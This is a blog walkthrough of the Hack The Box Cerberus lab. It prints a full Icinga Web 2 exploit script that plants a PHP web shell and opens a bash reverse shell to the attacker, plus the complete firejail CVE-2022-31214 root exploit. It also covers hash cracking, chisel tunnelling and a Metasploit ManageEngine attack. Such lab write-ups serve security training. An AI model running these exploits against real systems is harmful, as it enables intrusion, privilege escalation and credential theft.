In this blog post, I've included a comprehensive video tutorial alongside a written guide for the Hack The Box Cerberus Machine. Whether you prefer watching instructional videos or following written directions, this guide provides everything you need to fully comprehend the challenges and solutions of the Cerberus Machine. 🌟 Grow your cyber skills by signing up for Hack The Box https://affiliate.hackthebox.com/Kyser
Disclaimer: Please note that links I share to Hack The Box are affiliate links. This means that if you make a purchase through these links, I may receive a commission at no additional cost to you. Your support through these purchases helps me continue providing valuable content. Thank you!
Video Cerberus Walkthrough:
Written Cerberus Walkthrough:
Table of Contents
0. Scope
3. User Flag
4. System Flag
4.1 Enumeration
4.2 Exploitation
0. Scope
The target IP address and attack machine (or Pwnbox) IP address vary from instance to instance. Keep this in mind as you follow along with this walkthrough. You will need to swap my IPs with your IPs for many of the commands. I am using the current Hack The Box (HTB) Pwnbox for this walkthrough. However, feel free to use any Linux distribution you feel comfortable with. I believe most, if not all, penetration testing operating systems can get the job done. Before this write-up, I successfully pwned Cerberus using ‘kali-linux-2023.1-virtualbox-amd64’.
Target IP: 10.129.191.158 | Attack Machine IP: 10.10.14.23
1. Reconnaissance
To start, let’s do a SYN (stealth) nmap scan on all ports at increased speed by using:
sudo nmap -p- 10.129.191.158 -sS -T4Figure 1-1: Initial nmap scan
In the results, we can see that port 8080 is open. Port 8080, as the output suggests, is generally used for HTTP services. With that in mind, let’s open Firefox (or any other internet browser) and find out what’s at http://10.129.191.158:8080.
Figure 1-2: Server Not Found
Nothing interesting seems to be here at first glance; however, if you pay attention to the URL, you can see that we were redirected to http://icinga.cerberus.local:8080/icingaweb2. To fix this issue, we need to add “10.129.191.158 icinga.cerberus.local” to the “/etc/hosts” file on our attack machine using:
sudo nano /etc/hostsFigure 1-3 shows what your “/etc/hosts” file should look like to access the web server running on port 8080 on the target machine.
Figure 1-3: Adding the target to /etc/hosts
Return to your browser and refresh. You will be greeted with the Icinga web login portal.
Figure 1-4: Icinga login portal
After careful enumeration, we can discover an insecure direct object reference (IDOR) vulnerability located at http://icinga.cerberus.local:8080/icingaweb2/lib/icinga/icinga-php-thirdparty. With this vulnerability, we can view files that the web server has permission to view. For example, we can see the “/etc/passwd” file by navigating to http://icinga.cerberus.local:8080/icingaweb2/lib/icinga/icinga-php-thirdparty/etc/passwd. Interestingly, Cerberus is classified as a Windows machine on HTB but we are viewing a Linux file. We will explore why this is the case later. For now, note the “matthew” user in “/etc/passwd”.
Figure 1-5: IDOR Vulnerability
We can find other interesting files to view through trial and error and further online research on Incinga Web 2. Navigating to http://icinga.cerberus.local:8080/icingaweb2/lib/icinga/icinga-php-thirdparty/etc/icingaweb2/resources.ini reveals login credentials for the “matthew” user. Password: “IcingaWebPassword2023”.
Figure 1-6: matthew login credentials
Now return to the login portal at http://icinga.cerberus.local:8080/icingaweb2/authentication/login and login with Username: “matthew” & Password: “IcingaWebPassword2023”. After careful examination of the web server administrator dashboard, a lot of online research, and much trial and error, we discover that we can create users, upload private SSH keys, enable modules, and write .php files. All of these plus IDOR means we can do remote code execution (RCE) on the web server.
2. Initial Foothold
We can absolutely exploit RCE manually; however, the Incinga web server reverts many of its settings after a few minutes. Which means you have to be quick to pull off the manual method. I could not do all the steps fast enough to get this exploit to work manually. So, I used this python script:
Code 2-1: rce.py
import requests
import bs4
import argparse
import random
import string
def get_csrf(resp):
soup = bs4.BeautifulSoup(resp.text, "lxml")
csrf_token = soup.find("input", {"id": "CSRFToken"})["value"]
return csrf_token
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='lol')
parser.add_argument('-i', '--ip', help='nc listener ip', required=True)
parser.add_argument('-p', '--port', help='nc listener port', required=True)
args = parser.parse_args()
session = requests.session()
# LOGIN
URL = "http://icinga.cerberus.local:8080/icingaweb2/authentication/login"
resp = session.get(URL)
csrf_token = get_csrf(resp)
data = {"username":"matthew","password":"IcingaWebPassword2023","rememberme":"0","redirect":"","formUID":"form_login","CSRFToken":csrf_token,"btn_submit":"Login"}
resp = session.post(URL, data=data)
# CHANGE MODULE PATH
URL = "http://icinga.cerberus.local:8080/icingaweb2/config/general"
resp = session.get(URL)
csrf_token = get_csrf(resp)
data = {"global_show_stacktraces":"0","global_show_stacktraces":"1","global_show_application_state_messages":"0","global_show_application_state_messages":"1","global_module_path":"/dev/","global_config_resource":"icingaweb2","logging_log":"syslog","logging_level":"ERROR","logging_application":"icingaweb2","logging_facility":"user","themes_default":"Icinga","themes_disabled":"0","authentication_default_domain":"","formUID":"form_config_general","CSRFToken":csrf_token,"btn_submit":"Save Changes"}
resp = session.post(URL, data=data)
# ENABLE MODULE
URL = "http://icinga.cerberus.local:8080/icingaweb2/config/moduleenable"
resp = session.get(URL)
csrf_token = get_csrf(resp)
data = {"identifier":"shm","CSRFToken":csrf_token,"btn_submit":"btn_submit"}
resp = session.post(URL, data=data)
# UPLOAD SSH KEY
URL = "http://icinga.cerberus.local:8080/icingaweb2/config/createresource"
resp = session.get(URL)
csrf_token = get_csrf(resp)
data = {"type":"ssh","name":"test","user":"test","private_key":"-----BEGIN RSA PRIVATE KEY-----\r\n\
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\r\n\
-----END RSA PRIVATE KEY-----","formUID":"form_config_resource","CSRFToken":csrf_token,"btn_submit":"Save Changes"}
resp = session.post(URL, data=data)
# EXPLOIT: WRITE PHP FILE
URL = "http://icinga.cerberus.local:8080/icingaweb2/config/createresource"
resp = session.get(URL)
csrf_token = get_csrf(resp)
data = {"type":"ssh","name":"asdf2","user":"../../../../../dev/shm/run.php","private_key":"file:///etc/icingaweb2/ssh/test\x00<?php system($_REQUEST['cmd']);?>","formUID":"form_config_resource","CSRFToken":csrf_token,"btn_submit":"Save Changes"}
resp = session.post(URL, data=data)
# GET REVERSE SHELL
URL = "http://icinga.cerberus.local:8080/icingaweb2/shm/run"
data = {"cmd":"bash -c 'bash -i >& /dev/tcp/{}/{} 0>&1'".format(args.ip,args.port)}
session.post(URL, data=data)The Python script leverages security weaknesses in Icinga Web to upload a malicious SSH key, write a PHP file, and finally, use the PHP file to execute a reverse shell.
Before running the script, we need to make sure that we start a netcat listener in another terminal tab using:
nc -lnvp 8686Once the python script is on your machine, run it like this:
python3 rce.py -i 10.10.14.23 -p 8686If everything is set up correctly, we will get a shell on our listener tab. Initial foothold achieved!
Figure 2-1: Initial Foothold Achieved
3. User Flag
3.1 Privilege Escalation
Stabilizing your shell when you catch one is always a good idea. However, this will be 100% necessary to escalate our privileges on icinga. Run these commands in this order:
python3 -c 'import pty;pty.spawn("/bin/bash")'export TERM=xtermNow background the shell by pressing “ctrl+z” and run:
stty raw -echo; fgPress “enter” and now you have a fully interactive shell to explore icigna with.
Now it’s time to start the enumeration process with our initial access to search for a way to escalate our privileges on icinga. With a lot of searching, we can discover that Icinga is vulnerable to “firejail: local root exploit reachable via --join logic (CVE-2022-31214)”. You can read how and why the exploit works here: https://www.openwall.com/lists/oss-security/2022/06/08/10. The exploit is written in python3 and can be seen below:
Code 3-1: firejoin.py
#!/usr/bin/python3
# Author: Matthias Gerstner <matthias.gerstner@suse.com>
#
# Proof of concept local root exploit for a vulnerability in Firejail 0.9.68
# in joining Firejail instances.
#
# Prerequisites:
# - the firejail setuid-root binary needs to be installed and accessible to the
# invoking user
#
# Exploit: The exploit tricks the Firejail setuid-root program to join a fake
# Firejail instance. By using tmpfs mounts and symlinks in the unprivileged
# user namespace of the fake Firejail instance the result will be a shell that
# lives in an attacker controller mount namespace while the user namespace is
# still the initial user namespace and the nonewprivs setting is unset,
# allowing to escalate privileges via su or sudo.
import os
import shutil
import stat
import subprocess
import sys
import tempfile
import time
from pathlib import Path
# Print error message and exit with status 1
def printe(*args, **kwargs):
kwargs['file'] = sys.stderr
print(*args, **kwargs)
sys.exit(1)
# Return a boolean whether the given file path fulfils the requirements for the
# exploit to succeed:
# - owned by uid 0
# - size of 1 byte
# - the content is a single '1' ASCII character
def checkFile(f):
s = os.stat(f)
if s.st_uid != 0 or s.st_size != 1 or not stat.S_ISREG(s.st_mode):
return False
with open(f) as fd:
ch = fd.read(2)
if len(ch) != 1 or ch != "1":
return False
return True
def mountTmpFS(loc):
subprocess.check_call("mount -t tmpfs none".split() + [loc])
def bindMount(src, dst):
subprocess.check_call("mount --bind".split() + [src, dst])
def checkSelfExecutable():
s = os.stat(__file__)
if (s.st_mode & stat.S_IXUSR) == 0:
printe(f"{__file__} needs to have the execute bit set for the exploit to work. Run `chmod +x {__file__}` and try again.")
# This creates a "helper" sandbox that serves the purpose of making available
# a proper "join" file for symlinking to as part of the exploit later on.
#
# Returns a tuple of (proc, join_file), where proc is the running subprocess
# (it needs to continue running until the exploit happened) and join_file is
# the path to the join file to use for the exploit.
def createHelperSandbox():
# just run a long sleep command in an unsecured sandbox
proc = subprocess.Popen(
"firejail --noprofile -- sleep 10d".split(),
stderr=subprocess.PIPE)
# read out the child PID from the stderr output of firejail
while True:
line = proc.stderr.readline()
if not line:
raise Exception("helper sandbox creation failed")
# on stderr a line of the form "Parent pid <ppid>, child pid <pid>" is output
line = line.decode('utf8').strip().lower()
if line.find("child pid") == -1:
continue
child_pid = line.split()[-1]
try:
child_pid = int(child_pid)
break
except Exception:
raise Exception("failed to determine child pid from helper sandbox")
# We need to find the child process of the child PID, this is the
# actual sleep process that has an accessible root filesystem in /proc
children = f"/proc/{child_pid}/task/{child_pid}/children"
# If we are too quick then the child does not exist yet, so sleep a bit
for _ in range(10):
with open(children) as cfd:
line = cfd.read().strip()
kids = line.split()
if not kids:
time.sleep(0.5)
continue
elif len(kids) != 1:
raise Exception(f"failed to determine sleep child PID from helper sandbox: {kids}")
try:
sleep_pid = int(kids[0])
break
except Exception:
raise Exception("failed to determine sleep child PID from helper sandbox")
else:
raise Exception(f"sleep child process did not come into existence in {children}")
join_file = f"/proc/{sleep_pid}/root/run/firejail/mnt/join"
if not os.path.exists(join_file):
raise Exception(f"join file from helper sandbox unexpectedly not found at {join_file}")
return proc, join_file
# Re-executes the current script with unshared user and mount namespaces
def reexecUnshared(join_file):
if not checkFile(join_file):
printe(f"{join_file}: this file does not match the requirements (owner uid 0, size 1 byte, content '1')")
os.environ["FIREJOIN_JOINFILE"] = join_file
os.environ["FIREJOIN_UNSHARED"] = "1"
unshare = shutil.which("unshare")
if not unshare:
printe("could not find 'unshare' program")
cmdline = "unshare -U -r -m".split()
cmdline += [__file__]
# Re-execute this script with unshared user and mount namespaces
subprocess.call(cmdline)
if "FIREJOIN_UNSHARED" not in os.environ:
# First stage of execution, we first need to fork off a helper sandbox and
# an exploit environment
checkSelfExecutable()
helper_proc, join_file = createHelperSandbox()
reexecUnshared(join_file)
helper_proc.kill()
helper_proc.wait()
sys.exit(0)
else:
# We are in the sandbox environment, the suitable join file has been
# forwarded from the first stage via the environment
join_file = os.environ["FIREJOIN_JOINFILE"]
# We will make /proc/1/ns/user point to this via a symlink
time_ns_src = "/proc/self/ns/time"
# Make the firejail state directory writeable, we need to place a symlink to
# the fake join state file there
mountTmpFS("/run/firejail")
# Mount a tmpfs over the proc state directory of the init process, to place a
# symlink to a fake "user" ns there that firejail thinks it is joining
try:
mountTmpFS("/proc/1")
except subprocess.CalledProcessError:
# This is a special case for Fedora Linux where SELinux rules prevent us
# from mounting a tmpfs over proc directories.
# We can still circumvent this by mounting a tmpfs over all of /proc, but
# we need to bind-mount a copy of our own time namespace first that we can
# symlink to.
with open("/tmp/time", 'w') as _:
pass
time_ns_src = "/tmp/time"
bindMount("/proc/self/ns/time", time_ns_src)
mountTmpFS("/proc")
FJ_MNT_ROOT = Path("/run/firejail/mnt")
# Create necessary intermediate directories
os.makedirs(FJ_MNT_ROOT)
os.makedirs("/proc/1/ns")
# Firejail expects to find the umask for the "container" here, else it fails
with open(FJ_MNT_ROOT / "umask", 'w') as umask_fd:
umask_fd.write("022")
# Create the symlink to the join file to pass Firejail's sanity check
os.symlink(join_file, FJ_MNT_ROOT / "join")
# Since we cannot join our own user namespace again fake a user namespace that
# is actually a symlink to our own time namespace. This works since Firejail
# calls setns() without the nstype parameter.
os.symlink(time_ns_src, "/proc/1/ns/user")
# The process joining our fake sandbox will still have normal user privileges,
# but it will be a member of the mount namespace under the control of *this*
# script while *still* being a member of the initial user namespace.
# 'no_new_privs' won't be set since Firejail takes over the settings of the
# target process.
#
# This means we can invoke setuid-root binaries as usual but they will operate
# in a mount namespace under our control. To exploit this we need to adjust
# file system content in a way that a setuid-root binary grants us full
# root privileges. 'su' and 'sudo' are the most typical candidates for it.
#
# The tools are hardened a bit these days and reject certain files if not owned
# by root e.g. /etc/sudoers. There are various directions that could be taken,
# this one works pretty well though: Simply replacing the PAM configuration
# with one that will always grant access.
with tempfile.NamedTemporaryFile('w') as tf:
tf.write("auth sufficient pam_permit.so\n")
tf.write("account sufficient pam_unix.so\n")
tf.write("session sufficient pam_unix.so\n")
# Be agnostic about the PAM config file location in /etc or /usr/etc
for pamd in ("/etc/pam.d", "/usr/etc/pam.d"):
if not os.path.isdir(pamd):
continue
for service in ("su", "sudo"):
service = Path(pamd) / service
if not service.exists():
continue
# Bind mount over new "helpful" PAM config over the original
bindMount(tf.name, service)
print(f"You can now run 'firejail --join={os.getpid()}' in another terminal to obtain a shell where 'sudo su -' should grant you a root shell.")
while True:
line = sys.stdin.readline()
if not line:
breakCopy and paste the script into any directory that is writable by www-data. “/tmp” is a solid choice:
cd /tmpIf you use nano to write the script to a file, you can disregard the “Problem with history file” and “Unable to create directory” errors. Nano should work normally despite these errors assuming you stabilized your shell correctly. Now make “firejoin.py” executable with:
chmod +x firejoin.pyAnd run the exploit by doing:
python3 firejoin.pyNow you will see: “You can now run 'firejail --join=3508' in another terminal to obtain a shell where 'sudo su -' should grant you a root shell” On your terminal. Note that “3508” will change each time you run the exploit, so your numbers will almost definitely differ from mine. However, you don’t have to open a new tab; you can background the process with “ctrl+z” and then use:
firejail --join=3508Finally, do:
su -To get root privileges. Note that because www-data doesn’t have sudo privileges, ‘sudo su -’ will not work. If everything is done correctly, you will have fully compromised icinga. See Figure 3-1 for the complete list of steps minus the shell stabilization portion.
Figure 3-1: root access on icinga
3.1 Escaping the container
With root privileges, it doesn’t take long to realize that both user.txt and root.txt flags are non-existent on the system. You can see “172.16.22.1 DC.cerberus.local DC cerberus.local” inside of “/etc/hosts” on icinga. This confirms that there is another system we need to gain access to.
Figure 3-2: /etc/hosts file on icinga
Now that we know about our new target, we need to scan it for open ports. But how do we do that when both nmap and netcat aren’t installed on icinga? You can find a way to transfer nmap or netcat onto inciga. Or better yet, use a tool that is already on icinga. Icinga has socat installed and ready to go, so I wrote a socat port scanner in bash to scan “172.16.22.1”. I call it “socatmap”, and the code is below:
Code 3-2: socatmap.sh
#!/bin/bash
# Written by Kyser Clark | KyserClark.com | @KyserClark
# Define the usage message function
function usage {
echo "Usage: $0 -i [IP Address] -p [Port(s)]"
echo "Example: $0 -i 192.168.0.1 -p 80,443,1000-2000,-"
exit 1
}
# Parse the command-line arguments
while getopts ":i:p:" opt; do
case ${opt} in
i )
IP=$OPTARG
;;
p )
PORTS=$OPTARG
;;
* )
usage
;;
esac
done
# Check if the IP address and ports have been provided
if [[ -z $IP || -z $PORTS ]]; then
usage
fi
# Use socat to scan the ports on the target machine
for PORT in $(echo $PORTS | tr ',' ' '); do
if [[ $PORT == "-" ]]; then
PORT_RANGE="1-65535"
elif [[ $PORT == *-* ]]; then
START_PORT=$(echo $PORT | cut -d '-' -f 1)
END_PORT=$(echo $PORT | cut -d '-' -f 2)
PORT_RANGE=$(seq $START_PORT $END_PORT | tr '\n' ',')
PORT_RANGE=${PORT_RANGE::-1} # Remove the trailing comma
else
PORT_RANGE=$PORT
fi
for PORT in $(echo $PORT_RANGE | tr ',' ' '); do
(echo >/dev/tcp/$IP/$PORT >/dev/null 2>&1) &
PID=$!
sleep 0.2s
kill $PID >/dev/null 2>&1
wait $PID >/dev/null 2>&1
if [[ $? -eq 0 ]]; then
echo "Port $PORT is open"
fi
done
done
Copy and paste it into a file called “socatmap.sh”. Then make it executable with:
chmod +x socatmap.shThen run it like this:
./socatmap.sh -i 172.16.22.1 -p 5985Notice that we only scan port 5985 because it’s the only port we care about. Without prior knowledge, you would have to scan all 65535 ports with “-p 1-65535” to discover 5985 as open. Socatmap isn’t fast like nmap is, so to save time, you can trust me when I say you only care about port 5985 while doing this walkthrough.
Figure 3-3: port 5985 is open
With some quick online research, we can discover that port 5985 is the well-known port for Windows Remote Management (WinRM). We can log into WinRM if we can get some valid credentials. We can discover the “/var/lib/sss/db/” directory with more enumeration. Inside “/var/lib/sss/db” there is a file called “cache_cerberus.local.ldb”.
Figure 3-4: cache_cerberus.local.ldb file
We view the information inside “cache_cerberus.local.ldb” more easily by running:
strings cache_cerberus.local.ldbFigure 3-5: Opening cache_cerberus.local.ldb with strings
You will have to scroll up a bit to see this in your terminal. But what we have here is a username and a password hash:
$6$6LP9gyiXJCovapcy$0qmZTTjp9f2A0e7n4xk0L6ZoeKhhaCNm0VGJnX/Mu608QkliMpIy1FwKZlyUJAZU3FZ3.GQ.4N6bb9pxE3t3T0I couldn’t get “hashid” or “hash-identifier” to show me the type of hash we are dealing with here; however, hashes.com’s hash identifier works like a charm. You can find the tool at: https://hashes.com/en/tools/hash_identifier.
Figure 3-6: Hash Identifier
Now that we know we are dealing with sha512crypt, we can attempt to crack the hash with “hashcat” using the “rockyou.txt” wordlist. First, copy and paste the hash into a file called “hash.txt” on your attack machine and run:
hashcat -a3 -m 1800 hash.txt /usr/share/wordlists/rockyou.txtAfter a certain amount of time (time varies based on your computer’s resources, especially GPU) we crack the hash and get a password of “147258369”.
Figure 3-7: Hash Cracked with hashcat
Now that we seem to have a valid username and password, we need to find a way to connect to port 5985 on Cerberus (172.16.22.1). Unfortunately, we don’t have a way to reach that network, so we need to forward ports/tunnel from our attack machine through icinga to Cerberus. There are multiple tools to do this; however, we will use chisel.
Figure 3-8: Tunnel through Icinga to Cerberus
To set up a chisel tunnel, we first need to grab the latest version of chisel from https://github.com/jpillora/chisel/releases to put on our attack machine despite chisel already being installed. We will use be using “chisel_1.8.1_linux_amd64.gz”. You can download it easily by using wget:
wget https://github.com/jpillora/chisel/releases/download/v1.8.1/chisel_1.8.1_linux_amd64.gzSpoiler Alert: you don’t have to get the latest version of chisel for this first tunnel, but we will need the latest version for future tunnels in this walkthrough. If you don’t use the latest version now, you will have to retrace steps.
Once you download chisel, you need to unzip it with:
gunzip -d chisel_1.8.1_linux_amd64.gzThen make it executable with:
chmod +x chisel_1.8.1_linux_amd64Lastly, rename the file so we can type less when we use it:
mv chisel_1.8.1_linux_amd64 chiselFigure 3-9: Getting chisel ready to use
Now we need to start a simple python http server by doing:
python3 -m http.server 9001NOTICE: At this point forward, both my attack machine and the target machine’s IP address have changed due to reboots. My attack machine IP is now 10.10.14.39, and the target machine is now 10.129.229.4
Once the http server is running on your attack machine, switch back to your icinga tab and download chisel using:
wget http://10.10.14.39:9001/chiselFigure 3-10: Downloading chisel onto Icinga
Once chisel is downloaded to Icinga you may stop the http server as it is no longer needed at this time. Start the chisel server on your attack machine using:
./chisel server --reverse -p 9002Figure 3-11: Starting the chisel server on the attack machine
Now switch back over to Icinga’s terminal tab and run “chmod +x chisel”, then start the chisel client using:
./chisel client 10.10.14.39:9002 R:5985:172.16.22.1:5985Figure 3-12: Staring the chisel client on icinga
If you go back to your attack machine’s chisel listener tab, you should see it catching a session from icinga, as shown in figure 3-13. Make sure you keep all chisel terminal tabs open throughout this walkthrough.
Figure 3-13: chisel server catches a session
Now that we have the chisel tunnel setup up and working, we can finally attempt to log into Cerberus via WinRM with the credentials we found earlier. To do this, open a new tab on your attack machine and try:
evil-winrm -i 127.0.0.1 -u 'matthew@cerberus.local' -p 147258369Thankfully, this works, and now we are in control of the matthew user on Cerberus, which means we can finally get the user.txt flag as seen in Figure 3-14.
Figure 3-14: Getting the user flag
4. System Flag
4.1 Enumeration
We can spend an enormous amount of time searching Cerberus for interesting files that may lead to privilege escalation, but to save you time, I will let you know that the interesting content exists within “C:\Program Files (x86)\ManageEngine\ADSelfService Plus\conf\server.xml”. Here you can see that the vulnerable ManageEngine is running on port 9251. You can also see that ManageEngine uses SSL, which means that it also utilizes port 443 since it’s an http service. If you search the internet for ManageEngine exploits, you will eventually figure out that this version of ManageEngine (specifically ADSelfService) is vulnerable to CVE-2022-47966. You can read about the vulnerability and exploit at https://github.com/rapid7/metasploit-framework/pull/17556. Knowing this, we search Metasploit for usable modules. Start Metasploit with “msfconsole” on your attack machine and then run “search adselfservice”. Hopefully you see “exploit/multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966”, but if your Pwnbox doesn’t have this module like mine, you have to update the msfconsole database. Exit Metasploit and run:
sudo apt updatesudo apt install metasploit-frameworksudo apt-get upgrade metasploit-frameworksudo msfdb reinitNow start Metasploit and run the module search again. This second search strangely took a lot of time, be patient, and you should see the module we need. Now run:
use exploit/multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966Now run “show options” to see what we need to set to get our exploit to work.
Figure 4-1: Showing exploit options
We need to find the GUID and the ISSUER_URL. But before we can do that, we need to do more chisel tunneling so we can connect to Cerberus’s ManageEngine from our attack machine. However, we need to transfer the windows version of chisel this time. We can download it on to our attack machine with:
wget https://github.com/jpillora/chisel/releases/download/v1.8.1/chisel_1.8.1_windows_amd64.gzExtract it with:
gunzip -d chisel_1.8.1_windows_amd64.gzAnd Make it an .exe with:
mv chisel_1.8.1_windows_amd64 chisel.exeNow start up the simple http server with python the same way we did before. However, this time download chisel from the Evil-WinRM terminal using:
certutil -urlcache -f http://10.10.14.39:9001/chisel.exe chisel.exeEnsure you are in a folder the matthew user can write to. I like to “mkdir C:\temp”. Now we can start the chisel server in a new tab on our attack machine the same way as before, but with a different port and sudo (make sure you are in the directory you downloaded the newest version of chisel and make sure you use sudo!):
sudo ./chisel server --reverse -p 9003Now forward ports 443 and 9251 from the Evil-WinRM terminal to your attack machine using:
./chisel.exe client 10.10.14.39:9003 R:443:localhost:443 R:9251:localhost:9251If everything is set up correctly, you will see a session on your attack machine chisel listener tab, as shown in Figure 4-2.
Figure 4-2: Chisel forwarding ports 443 and 9251
Now we need to add “127.0.0.1 dc dc.cerberus.local” to “/etc/hosts” on our attack machine to connect to Cerberus via our web browser.
Figure 4-3: Adding dc dc.cerberus local into etc/hosts
After a lot of enumeration, you can find the entityID (issuer_url) located at https://dc.cerberus.local/FederationMetadata/2007-06/FederationMetadata.xml.
Figure 4-4: Getting the entityID
And you can find the GUID at https://127.0.0.1:9251/ after logging in with the same credentials as before. Username: “matthew@cerberus.local” and Password: “147258369”.
Figure 4-5: Getting the GUID
NOTICE: Firefox will raise an alert because it does not trust the certificate (and rightly so since it is self-signed); you must click “advanced” then accept the risk and continue to view the two web links.
4.1 Exploitation
Now that we have the entityID and the Issuer_URL, we have everything in place to run the Metasploit module. Do these commands in this order to gain administrative access to Cerberus:
msfconsoleuse exploit/multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966set GUID 67a8d101690402dc6a6744b8fc8a7ca1acf88b2fset ISSUER_URL http://dc.cerberus.local/adfs/services/trustset RHOSTS 127.0.0.1set LHOST 10.10.14.39exploitFigure 4-6: Setting up metasploit
If everything is properly set up, you will catch a meterpreter shell. To view the root.txt flag run:
cat C:/Users/Administrator/Desktop/root.txtFigure 4-7: Getting the root.txt flag
And with that, we have successfully Pwned Cerberus! Congratulations! I hope you have found this walkthrough useful.